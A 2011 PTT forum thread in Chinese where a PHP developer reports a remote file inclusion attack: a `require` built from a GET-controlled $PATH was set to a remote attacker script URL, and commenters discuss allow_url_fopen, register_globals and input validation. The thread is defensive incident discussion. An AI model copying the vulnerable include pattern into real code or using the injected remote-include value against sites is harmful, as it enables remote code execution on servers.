作者september02 (九月二號)
看板PHP
標題Re: [請益] 網路攻擊?
時間Tue Jul 5 21:40:08 2011
已經找到了漏洞了,所以上來報告一下
我程式中有一行
require $PATH.'config.php';
這個$PATH是和一個GET變數有關,所以被人把$PATH設成了
"
http://www.XXX.XX/webcam/pesquisadorRFI.txt?"
整行就變成了
require(
http://www.XXX.XX/webcam/pesquisadorRFI.txt?/config.php)
另外提醒大家
PHP.INI中的allow_url_fopen
最好是設成OFF(預設ON)
可以避免以上的問題發生
--
愛情真奇妙,可以讓二個陌生的人變的如此親密
婚姻更奇妙,可以讓二個親密的人變的如此陌生
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 218.167.184.34
1F:→ gname:我比較想知道為什麼你的GET會被竄改? source code被改? 07/05 23:16
2F:→ gname:還是你完全沒有過濾就直接把GET就用上去了? 07/05 23:18
3F:→ mrbigmouth:比起關allow_url_fopen 對使用端的所有輸入進行檢查才 07/06 00:26
4F:→ mrbigmouth:是正道 07/06 00:26
5F:→ mrbigmouth:我的辦法是在所有網頁開頭放置檢查函數 詳細定義這個 07/06 00:27
6F:→ mrbigmouth:網頁有哪些POST或GET變數 變數是數字or字串 and長度等 07/06 00:28
7F:→ sdcomputer:變數污染的問題遠比allow_url_fopen還重要多了.. 07/06 00:32
8F:→ bibo9901:應該是把register_globals關掉才對 07/06 01:12
9F:→ MOONRAKER:register_globals不是控制要不要把$_REQUEST裡面的東東 07/06 09:37
10F:→ MOONRAKER:註冊成全域變數嗎 他應該沒有直接這樣使用吧 07/06 09:38
11F:推 LPH66:$_GET 也是 $_REQUEST 裡的東西啊... 07/06 13:14
12F:→ LPH66:所以這裡就是那個人用 ?PATH=xxxx 去給它設值而已 07/06 13:15
13F:→ LPH66:我也覺得應該要關 register_globals 07/06 13:17
14F:→ MOONRAKER:他如果用$PATH=$_GET['path']那有沒有關都一樣啦 07/06 14:41
15F:推 LPH66:也是 所以還是自己程式寫作的習慣問題... 07/06 17:48
16F:→ september02:是的,是我寫程式的習慣不好... 07/07 12:09
17F:→ mirae:不管習慣好不好,官方register_global建議要關掉,有安全問題 07/10 08:36
19F:→ MOONRAKER:新的沒有人還開著了吧。 07/11 17:43
20F:→ mirae:告訴學員說register_global必須打開程式才能work..真實故事. 07/12 07:11
21F:→ mirae:這很難說,之前聽過一個故事,某職訓班PHP講師上課時演示程式, 07/12 07:14